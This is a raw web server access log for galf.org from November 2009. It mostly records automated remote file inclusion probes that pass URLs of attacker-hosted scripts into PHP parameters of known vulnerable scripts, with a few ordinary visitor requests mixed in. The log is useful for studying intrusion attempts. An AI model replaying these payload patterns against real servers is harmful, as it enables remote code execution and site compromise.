121.136.177.137 - - [01/Nov/2009:21:51:59 -0800] "GET /logs/access_090323.log//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.hotlinkfiles.com/files/2428440_iga95/id-1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.230.118.81 - - [01/Nov/2009:21:52:04 -0800] "GET /logs/access_090525.log//?_SERVER[DOCUMENT_ROOT]=http://brus.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.230.118.81 - - [01/Nov/2009:21:52:04 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://brus.fileave.com/id1.txt?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.galf.org"
58.230.118.81 - - [01/Nov/2009:21:52:05 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://brus.fileave.com/id1.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
58.230.118.81 - - [01/Nov/2009:21:52:05 -0800] "GET /logs/access_090525.log//?_SERVER[DOCUMENT_ROOT]=http://brus.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.230.118.81 - - [01/Nov/2009:21:52:05 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://brus.fileave.com/id1.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
58.230.118.81 - - [01/Nov/2009:21:52:05 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://brus.fileave.com/id1.txt?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.galf.org"
58.230.118.81 - - [01/Nov/2009:21:52:06 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://brus.fileave.com/id1.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
58.230.118.81 - - [01/Nov/2009:21:52:06 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://brus.fileave.com/id1.txt?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.galf.org"
58.230.118.81 - - [01/Nov/2009:21:52:06 -0800] "GET /logs/access_090525.log//?_SERVER[DOCUMENT_ROOT]=http://brus.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
141.223.60.4 - - [01/Nov/2009:21:52:08 -0800] "GET ///skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
141.223.60.4 - - [01/Nov/2009:21:52:08 -0800] "GET /logs////skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
141.223.60.4 - - [01/Nov/2009:21:52:08 -0800] "GET /logs/access.log%20%20////skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
58.230.118.81 - - [01/Nov/2009:21:52:09 -0800] "GET /logs/access_090914.log//?_SERVER[DOCUMENT_ROOT]=http://brus.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.230.118.81 - - [01/Nov/2009:21:52:09 -0800] "GET /logs/access_090914.log//?_SERVER[DOCUMENT_ROOT]=http://brus.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.230.118.81 - - [01/Nov/2009:21:52:10 -0800] "GET /logs/access_090914.log//?_SERVER[DOCUMENT_ROOT]=http://brus.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
141.223.60.4 - - [01/Nov/2009:21:52:16 -0800] "GET /logs////skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
141.223.60.4 - - [01/Nov/2009:21:52:16 -0800] "GET ///skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
141.223.60.4 - - [01/Nov/2009:21:52:16 -0800] "GET /logs/access.log%20%20////skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
58.230.118.81 - - [01/Nov/2009:21:52:44 -0800] "GET /logs/access_090525.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://brus.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.230.118.81 - - [01/Nov/2009:21:52:44 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://brus.fileave.com/id1.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
58.230.118.81 - - [01/Nov/2009:21:52:44 -0800] "GET /logs/access_090914.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://brus.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.230.118.81 - - [01/Nov/2009:21:52:44 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://brus.fileave.com/id1.txt?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.galf.org"
58.230.118.81 - - [01/Nov/2009:21:52:44 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://brus.fileave.com/id1.txt?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.galf.org"
58.230.118.81 - - [01/Nov/2009:21:52:44 -0800] "GET /logs/access_090525.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://brus.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.230.118.81 - - [01/Nov/2009:21:52:44 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://brus.fileave.com/id1.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
58.230.118.81 - - [01/Nov/2009:21:52:44 -0800] "GET /logs/access_090914.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://brus.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.230.118.81 - - [01/Nov/2009:21:52:45 -0800] "GET /logs/access_090525.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://brus.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.230.118.81 - - [01/Nov/2009:21:52:45 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://brus.fileave.com/id1.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
58.230.118.81 - - [01/Nov/2009:21:52:46 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://brus.fileave.com/id1.txt?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.galf.org"
58.230.118.81 - - [01/Nov/2009:21:52:46 -0800] "GET /logs/access_090914.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://brus.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.230.118.81 - - [01/Nov/2009:21:52:48 -0800] "GET /logs/access_090504.log//?_SERVER[DOCUMENT_ROOT]=http://brus.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.230.118.81 - - [01/Nov/2009:21:52:48 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://brus.fileave.com/id1.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
58.230.118.81 - - [01/Nov/2009:21:52:48 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://brus.fileave.com/id1.txt?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.galf.org"
58.230.118.81 - - [01/Nov/2009:21:52:54 -0800] "GET /logs/access_090504.log//?_SERVER[DOCUMENT_ROOT]=http://brus.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.230.118.81 - - [01/Nov/2009:21:52:54 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://brus.fileave.com/id1.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
58.230.118.81 - - [01/Nov/2009:21:52:54 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://brus.fileave.com/id1.txt?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.galf.org"
121.136.177.137 - - [01/Nov/2009:21:53:59 -0800] "GET /logs/access_090413.log//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.hotlinkfiles.com/files/2428440_iga95/id-1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [01/Nov/2009:21:54:18 -0800] "GET /logs/access.log///skin/dognara_gallery/setup.php?dir=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
141.223.60.4 - - [01/Nov/2009:21:54:30 -0800] "GET /logs/access.log///skin/dognara_gallery/setup.php?dir=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.73.17.7 - - [01/Nov/2009:21:55:37 -0800] "GET /logs/access_090824.log/cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.73.17.7 - - [01/Nov/2009:21:56:29 -0800] "GET /logs/access_090824.log/cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.73.17.7 - - [01/Nov/2009:21:56:46 -0800] "GET /logs/access_090427.log/cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.73.17.7 - - [01/Nov/2009:21:56:46 -0800] "GET /logs/access_090504.log/cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.73.17.7 - - [01/Nov/2009:21:56:50 -0800] "GET /logs/access_090427.log/cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.73.17.7 - - [01/Nov/2009:21:57:05 -0800] "GET /logs/access_090504.log/cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.73.17.7 - - [01/Nov/2009:21:57:53 -0800] "GET /logs/access_090608.log/cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
141.223.60.4 - - [01/Nov/2009:21:57:54 -0800] "GET /logs///standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
141.223.60.4 - - [01/Nov/2009:21:57:54 -0800] "GET /logs/access_090511.log///standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
141.223.60.4 - - [01/Nov/2009:21:57:54 -0800] "GET /logs/access_090601.log///standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
141.223.60.4 - - [01/Nov/2009:21:57:54 -0800] "GET //standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
141.223.60.4 - - [01/Nov/2009:21:57:58 -0800] "GET /logs/access_090601.log///standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
141.223.60.4 - - [01/Nov/2009:21:57:58 -0800] "GET //standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
141.223.60.4 - - [01/Nov/2009:21:57:58 -0800] "GET /logs///standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
141.223.60.4 - - [01/Nov/2009:21:57:58 -0800] "GET /logs/access_090511.log///standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
61.47.7.71 - - [01/Nov/2009:21:59:27 -0800] "GET /logs/access_090427.log/?sourcedir=http://www.newminiclub.nl/logo.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
61.47.7.71 - - [01/Nov/2009:21:59:27 -0800] "GET /?sourcedir=http://www.newminiclub.nl/logo.gif??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
61.47.7.71 - - [01/Nov/2009:21:59:27 -0800] "GET /logs/?sourcedir=http://www.newminiclub.nl/logo.gif??? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.galf.org"
222.73.17.7 - - [01/Nov/2009:22:01:14 -0800] "GET /logs/access_090914.log/cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.73.17.7 - - [01/Nov/2009:22:01:22 -0800] "GET /logs/access_090914.log/cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
141.223.60.4 - - [01/Nov/2009:22:01:53 -0800] "GET /logs////skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
141.223.60.4 - - [01/Nov/2009:22:01:53 -0800] "GET /logs/access_090525.log////skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
141.223.60.4 - - [01/Nov/2009:22:01:53 -0800] "GET ///skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
201.198.90.254 - - [01/Nov/2009:22:02:26 -0800] "GET /imagenes/logotipo.jpg HTTP/1.1" 404 275 "http://es.mc236.mail.yahoo.com/mc/showletter;_ylc=X3oDMTU0dHBpMGJlBEFjdGlvbgNWaWV3IG1lc3NhZ2UESW50bANlcwRMbmtUeXADUmVndWxhcgRQYXJ0VHlwZQNZYWhvbyEEUmVzUG9zQQMyNARSZXNQb3NSAzI0BFNyY2hDdXJyA21lc3NhZ2UEU3JjaERlc3QDbWVzc2FnZXZpZXcEX1F1ZXJ5SWQDMzcxNzQ3ODYwNzRhZWU3NWRhNDk4Y2EEX1MDMTUwNTAwNjEy?mid=1_25807_1_2884196_0_AP7JjkQAAYPgQssM9AHMiRgAgKQ&fid=%2540S%2540Search&prevMid=1_24744_1_2879381_0_AIrJjkQAAMPqQsxg5gLMMBPuPyE&nextMid=1_26992_1_2894378_0_AJjIjkQAAXVxQsmhLgg0GR%2BfKDw&order=down&search=1&extraargs=%26.rand%3D1238578185" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9) Gecko/2008061004 Firefox/3.0" "www.galf.org"
201.198.90.254 - - [01/Nov/2009:22:02:26 -0800] "GET /imagenes/galfindex_02.jpg HTTP/1.1" 404 275 "http://es.mc236.mail.yahoo.com/mc/showletter;_ylc=X3oDMTU0dHBpMGJlBEFjdGlvbgNWaWV3IG1lc3NhZ2UESW50bANlcwRMbmtUeXADUmVndWxhcgRQYXJ0VHlwZQNZYWhvbyEEUmVzUG9zQQMyNARSZXNQb3NSAzI0BFNyY2hDdXJyA21lc3NhZ2UEU3JjaERlc3QDbWVzc2FnZXZpZXcEX1F1ZXJ5SWQDMzcxNzQ3ODYwNzRhZWU3NWRhNDk4Y2EEX1MDMTUwNTAwNjEy?mid=1_25807_1_2884196_0_AP7JjkQAAYPgQssM9AHMiRgAgKQ&fid=%2540S%2540Search&prevMid=1_24744_1_2879381_0_AIrJjkQAAMPqQsxg5gLMMBPuPyE&nextMid=1_26992_1_2894378_0_AJjIjkQAAXVxQsmhLgg0GR%2BfKDw&order=down&search=1&extraargs=%26.rand%3D1238578185" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9) Gecko/2008061004 Firefox/3.0" "www.galf.org"
201.198.90.254 - - [01/Nov/2009:22:02:27 -0800] "GET /imagenes/base.jpg HTTP/1.1" 404 275 "http://es.mc236.mail.yahoo.com/mc/showletter;_ylc=X3oDMTU0dHBpMGJlBEFjdGlvbgNWaWV3IG1lc3NhZ2UESW50bANlcwRMbmtUeXADUmVndWxhcgRQYXJ0VHlwZQNZYWhvbyEEUmVzUG9zQQMyNARSZXNQb3NSAzI0BFNyY2hDdXJyA21lc3NhZ2UEU3JjaERlc3QDbWVzc2FnZXZpZXcEX1F1ZXJ5SWQDMzcxNzQ3ODYwNzRhZWU3NWRhNDk4Y2EEX1MDMTUwNTAwNjEy?mid=1_25807_1_2884196_0_AP7JjkQAAYPgQssM9AHMiRgAgKQ&fid=%2540S%2540Search&prevMid=1_24744_1_2879381_0_AIrJjkQAAMPqQsxg5gLMMBPuPyE&nextMid=1_26992_1_2894378_0_AJjIjkQAAXVxQsmhLgg0GR%2BfKDw&order=down&search=1&extraargs=%26.rand%3D1238578185" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9) Gecko/2008061004 Firefox/3.0" "www.galf.org"
141.223.60.4 - - [01/Nov/2009:22:03:24 -0800] "GET /logs/access_090413.log////skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.44.162 - - [01/Nov/2009:22:05:07 -0800] "GET /logs/access_090511.log//?view=page&pagename=http://www.shoppingxxxsource.com/pandegaid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
69.175.44.162 - - [01/Nov/2009:22:05:07 -0800] "GET /?view=page&pagename=http://www.shoppingxxxsource.com/pandegaid.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
69.175.44.162 - - [01/Nov/2009:22:05:12 -0800] "GET /logs/access_090511.log//?view=page&pagename=http://www.trznica.rimava.sk/baner.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.44.162 - - [01/Nov/2009:22:05:12 -0800] "GET /?view=page&pagename=http://www.trznica.rimava.sk/baner.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
69.175.44.162 - - [01/Nov/2009:22:05:12 -0800] "GET /logs//?view=page&pagename=http://www.trznica.rimava.sk/baner.txt? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.galf.org"
201.198.90.254 - - [01/Nov/2009:22:05:47 -0800] "GET /cendoc/pdf/Rojas-Historia3.pdf HTTP/1.1" 404 275 "http://es.mc236.mail.yahoo.com/mc/showletter;_ylc=X3oDMTU0dHBpMGJlBEFjdGlvbgNWaWV3IG1lc3NhZ2UESW50bANlcwRMbmtUeXADUmVndWxhcgRQYXJ0VHlwZQNZYWhvbyEEUmVzUG9zQQMyNARSZXNQb3NSAzI0BFNyY2hDdXJyA21lc3NhZ2UEU3JjaERlc3QDbWVzc2FnZXZpZXcEX1F1ZXJ5SWQDMzcxNzQ3ODYwNzRhZWU3NWRhNDk4Y2EEX1MDMTUwNTAwNjEy?mid=1_25807_1_2884196_0_AP7JjkQAAYPgQssM9AHMiRgAgKQ&fid=%2540S%2540Search&prevMid=1_24744_1_2879381_0_AIrJjkQAAMPqQsxg5gLMMBPuPyE&nextMid=1_26992_1_2894378_0_AJjIjkQAAXVxQsmhLgg0GR%2BfKDw&order=down&search=1&extraargs=%26.rand%3D1238578185" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9) Gecko/2008061004 Firefox/3.0" "www.galf.org"
201.198.90.254 - - [01/Nov/2009:22:05:48 -0800] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9) Gecko/2008061004 Firefox/3.0" "www.galf.org"
201.198.90.254 - - [01/Nov/2009:22:05:51 -0800] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9) Gecko/2008061004 Firefox/3.0" "www.galf.org"
61.47.7.71 - - [01/Nov/2009:22:05:53 -0800] "GET /logs/access_090518.log%20%20/?sourcedir=http://www.newminiclub.nl/logo.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.44.162 - - [01/Nov/2009:22:05:53 -0800] "GET /logs/access_090511.log//?view=page&pagename=http://www.shoppingxxxsource.com/pandegaid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.832" "www.galf.org"
69.175.44.162 - - [01/Nov/2009:22:05:54 -0800] "GET /?view=page&pagename=http://www.shoppingxxxsource.com/pandegaid.txt?? HTTP/1.1" 200 1048 "-" "libwww-perl/5.832" "www.galf.org"
69.175.44.162 - - [01/Nov/2009:22:05:54 -0800] "GET /logs//?view=page&pagename=http://www.shoppingxxxsource.com/pandegaid.txt?? HTTP/1.1" 200 4947 "-" "libwww-perl/5.832" "www.galf.org"
69.175.44.162 - - [01/Nov/2009:22:06:11 -0800] "GET /?view=page&pagename=http://www.shoppingxxxsource.com/pandegaid.txt?? HTTP/1.1" 200 1048 "-" "libwww-perl/5.832" "www.galf.org"
141.223.60.4 - - [01/Nov/2009:22:06:18 -0800] "GET /logs////skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
141.223.60.4 - - [01/Nov/2009:22:06:18 -0800] "GET /logs/access_090525.log////skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
141.223.60.4 - - [01/Nov/2009:22:06:18 -0800] "GET ///skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.192.251.146 - - [01/Nov/2009:22:06:44 -0800] "GET /logs/access_090511.log//?view=page&pagename=http://www.trznica.rimava.sk/baner.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.192.251.146 - - [01/Nov/2009:22:06:44 -0800] "GET /?view=page&pagename=http://www.trznica.rimava.sk/baner.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
67.192.251.146 - - [01/Nov/2009:22:06:44 -0800] "GET /logs//?view=page&pagename=http://www.trznica.rimava.sk/baner.txt? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.galf.org"
69.175.44.162 - - [01/Nov/2009:22:06:59 -0800] "GET /logs/access_090511.log%20%20//?view=page&pagename=http://www.trznica.rimava.sk/baner.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
141.223.60.4 - - [01/Nov/2009:22:07:57 -0800] "GET /logs/access_090413.log////skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.192.251.146 - - [01/Nov/2009:22:08:54 -0800] "GET /logs/access_090511.log%20%20//?view=page&pagename=http://www.trznica.rimava.sk/baner.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
75.126.218.14 - - [01/Nov/2009:22:12:17 -0800] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
75.126.218.14 - - [01/Nov/2009:22:12:17 -0800] "GET /logs/access_090316.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
75.126.218.14 - - [01/Nov/2009:22:12:17 -0800] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
75.126.218.14 - - [01/Nov/2009:22:12:25 -0800] "GET /logs/access_090817.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
75.126.218.14 - - [01/Nov/2009:22:12:37 -0800] "GET /logs/access_090316.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
75.126.218.14 - - [01/Nov/2009:22:12:37 -0800] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
75.126.218.14 - - [01/Nov/2009:22:12:37 -0800] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
75.126.218.14 - - [01/Nov/2009:22:12:42 -0800] "GET /logs/access_090817.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
207.14.32.241 - - [01/Nov/2009:22:13:58 -0800] "GET /logs/access_090831.log//setup.php?dir=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
207.14.32.241 - - [01/Nov/2009:22:13:58 -0800] "GET /setup.php?dir=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
207.14.32.241 - - [01/Nov/2009:22:13:58 -0800] "GET /logs//setup.php?dir=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
